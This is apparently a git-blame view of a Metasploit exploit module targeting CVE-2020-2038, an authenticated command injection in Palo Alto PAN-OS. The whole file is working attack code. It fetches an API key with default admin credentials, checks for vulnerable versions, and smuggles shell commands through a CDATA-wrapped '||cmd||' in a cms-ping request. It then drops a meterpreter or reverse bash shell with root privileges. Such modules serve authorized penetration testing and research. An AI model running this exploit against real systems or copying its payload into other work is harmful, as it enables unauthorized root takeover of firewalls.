2022-08-16 09:44:05 -04:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
|
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Exploit::CmdStager
|
2022-08-17 17:24:03 -04:00
|
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
2022-08-16 09:44:05 -04:00
|
|
|
|
2022-08-17 17:43:16 -04:00
|
|
|
require 'ipaddr'
|
2022-09-13 12:40:59 -04:00
|
|
|
|
|
|
|
|
class InvalidRequest < StandardError
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
class InvalidResponse < StandardError
|
|
|
|
|
end
|
2022-08-17 17:43:16 -04:00
|
|
|
|
2022-08-16 09:44:05 -04:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(
|
|
|
|
|
update_info(
|
|
|
|
|
info,
|
|
|
|
|
'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',
|
|
|
|
|
'Description' => %q{
|
2022-08-17 17:24:03 -04:00
|
|
|
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
|
|
|
|
|
administrators to execute arbitrary OS commands with root privileges.
|
|
|
|
|
This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
|
2022-08-16 09:44:05 -04:00
|
|
|
},
|
|
|
|
|
'Author' => [
|
2022-08-17 14:02:39 -04:00
|
|
|
'Mikhail Klyuchnikov', # Vulnerability discovery
|
|
|
|
|
'Nikita Abramov', # Vulnerability discovery
|
2022-09-12 17:34:57 -04:00
|
|
|
'UnD3sc0n0c1d0', # Exploit
|
|
|
|
|
'jheysel-r7' # msf module
|
2022-08-16 09:44:05 -04:00
|
|
|
],
|
|
|
|
|
'References' => [
|
|
|
|
|
['CVE', '2020-2038'],
|
|
|
|
|
['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
|
2022-08-17 13:32:14 -04:00
|
|
|
['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
|
|
|
|
|
['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
|
2022-08-16 09:44:05 -04:00
|
|
|
],
|
|
|
|
|
'DisclosureDate' => '2020-09-09',
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'Targets' => [
|
|
|
|
|
[
|
2022-09-12 17:35:25 -04:00
|
|
|
'Linux ',
|
2022-08-16 09:44:05 -04:00
|
|
|
{
|
|
|
|
|
'Platform' => 'linux',
|
2022-08-18 15:19:14 -04:00
|
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
2022-09-13 12:40:59 -04:00
|
|
|
'CmdStagerFlavor' => %i[echo printf],
|
2022-09-12 17:35:25 -04:00
|
|
|
'Type' => :linux_dropper,
|
|
|
|
|
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
[
|
|
|
|
|
'Unix In-Memory',
|
|
|
|
|
{
|
|
|
|
|
'Platform' => 'unix',
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Type' => :unix_memory,
|
|
|
|
|
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
|
2022-08-16 09:44:05 -04:00
|
|
|
}
|
|
|
|
|
]
|
2022-08-18 16:20:03 -04:00
|
|
|
],
|
2022-08-16 09:44:05 -04:00
|
|
|
'DefaultTarget' => 0,
|
2022-08-18 16:20:03 -04:00
|
|
|
'DefaultOptions' => {
|
|
|
|
|
'RPORT' => 443,
|
|
|
|
|
'SSL' => true
|
|
|
|
|
},
|
2022-08-16 09:44:05 -04:00
|
|
|
'Notes' => {
|
|
|
|
|
'Stability' => [ CRASH_SAFE ],
|
|
|
|
|
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
|
|
|
|
|
'Reliability' => [ REPEATABLE_SESSION ]
|
|
|
|
|
}
|
|
|
|
|
)
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
2022-08-17 17:24:03 -04:00
|
|
|
OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),
|
2022-08-16 09:44:05 -04:00
|
|
|
OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
|
|
|
|
|
]
|
|
|
|
|
)
|
2022-08-17 17:24:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
print_status('Authenticating...')
|
2022-08-18 16:20:03 -04:00
|
|
|
begin
|
|
|
|
|
@api_key = api_key
|
2022-09-13 12:40:59 -04:00
|
|
|
rescue InvalidRequest, InvalidResponse => e
|
2022-09-15 10:45:11 -04:00
|
|
|
return Exploit::CheckCode::Safe("Error retrieving API key: #{e.class}, #{e}")
|
2022-08-18 16:20:03 -04:00
|
|
|
end
|
2022-08-17 17:24:03 -04:00
|
|
|
res = send_request_cgi({
|
2022-08-17 17:43:16 -04:00
|
|
|
'method' => 'GET',
|
2022-10-03 19:50:04 -04:00
|
|
|
'keep_cookies' => true,
|
2022-09-14 12:59:56 -04:00
|
|
|
'uri' => normalize_uri(target_uri.path, 'api/'),
|
2022-08-17 17:43:16 -04:00
|
|
|
'vars_get' => {
|
|
|
|
|
'type' => 'version',
|
|
|
|
|
'key' => @api_key
|
|
|
|
|
}
|
|
|
|
|
})
|
2022-08-17 17:24:03 -04:00
|
|
|
|
2022-09-15 10:45:11 -04:00
|
|
|
return CheckCode::Unknown('The API did not respond to the request for the version of PAN_OS') unless res&.body
|
2022-08-18 16:20:03 -04:00
|
|
|
|
2022-08-18 16:15:21 -04:00
|
|
|
version = Rex::Version.new(res.get_xml_document.xpath('/response/result/sw-version').text)
|
2022-08-17 17:24:03 -04:00
|
|
|
|
2022-09-15 10:29:28 -04:00
|
|
|
if version >= Rex::Version.new('9.0.0') && version < Rex::Version.new('9.0.10') ||
|
|
|
|
|
version >= Rex::Version.new('9.1.0') && version < Rex::Version.new('9.1.4') ||
|
|
|
|
|
version >= Rex::Version.new('10.0.0') && version < Rex::Version.new('10.0.1')
|
2022-09-15 10:45:11 -04:00
|
|
|
return Exploit::CheckCode::Appears
|
2022-08-17 17:24:03 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
Exploit::CheckCode::Safe
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def api_key
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'api/'),
|
|
|
|
|
'vars_get' => {
|
|
|
|
|
'type' => 'keygen',
|
|
|
|
|
'user' => datastore['USERNAME'],
|
|
|
|
|
'password' => datastore['PASSWORD']
|
|
|
|
|
}
|
|
|
|
|
})
|
|
|
|
|
|
|
|
|
|
if res.nil?
|
2022-09-13 12:40:59 -04:00
|
|
|
raise InvalidRequest, 'Unreachable'
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if res.code == 401
|
2022-09-13 12:40:59 -04:00
|
|
|
raise InvalidRequest, 'Server returned HTTP status 401 - Authentication failed'
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if res.code == 403
|
2022-09-13 12:40:59 -04:00
|
|
|
raise InvalidRequest, 'Server returned HTTP status 403 - Authentication failed with "Invalid Credentials"'
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if res.body.blank?
|
2022-09-13 12:40:59 -04:00
|
|
|
raise InvalidResponse, 'Empty reply from server'
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
2022-08-18 15:19:04 -04:00
|
|
|
key = res.get_xml_document.xpath('/response/result/key')&.text
|
2022-08-16 09:44:05 -04:00
|
|
|
|
|
|
|
|
if key.nil?
|
2022-09-13 12:40:59 -04:00
|
|
|
raise InvalidResponse, 'Empty reply from server'
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
2022-09-13 12:40:59 -04:00
|
|
|
print_good('Successfully obtained api key')
|
|
|
|
|
|
2022-08-16 09:44:05 -04:00
|
|
|
key
|
|
|
|
|
end
|
|
|
|
|
|
2022-08-17 17:43:16 -04:00
|
|
|
def execute_command(cmd, _opts = {})
|
|
|
|
|
payload = "<cms-ping><host>#{IPAddr.new(rand(2**32), Socket::AF_INET)}</host><count>#{rand(1..50)}</count><pattern>111<![CDATA[||#{cmd}||]]></pattern></cms-ping>"
|
2022-08-16 09:44:05 -04:00
|
|
|
send_request_cgi({
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'api/'),
|
|
|
|
|
'vars_get' => {
|
|
|
|
|
'cmd' => payload,
|
|
|
|
|
'type' => 'op',
|
2022-08-17 17:24:03 -04:00
|
|
|
'key' => @api_key
|
2022-08-16 09:44:05 -04:00
|
|
|
}
|
|
|
|
|
})
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
2022-09-13 12:40:59 -04:00
|
|
|
begin
|
|
|
|
|
@api_key ||= api_key
|
|
|
|
|
rescue InvalidRequest, InvalidResponse => e
|
|
|
|
|
fail_with(Failure::UnexpectedReply, "Error retrieving API key: #{e}")
|
|
|
|
|
end
|
2022-08-16 09:44:05 -04:00
|
|
|
print_status('Exploiting...')
|
2022-09-13 12:40:59 -04:00
|
|
|
case target['Type']
|
|
|
|
|
when :unix_memory
|
|
|
|
|
execute_command(payload.encoded)
|
|
|
|
|
when :linux_dropper
|
|
|
|
|
execute_cmdstager
|
|
|
|
|
end
|
2022-08-16 09:44:05 -04:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
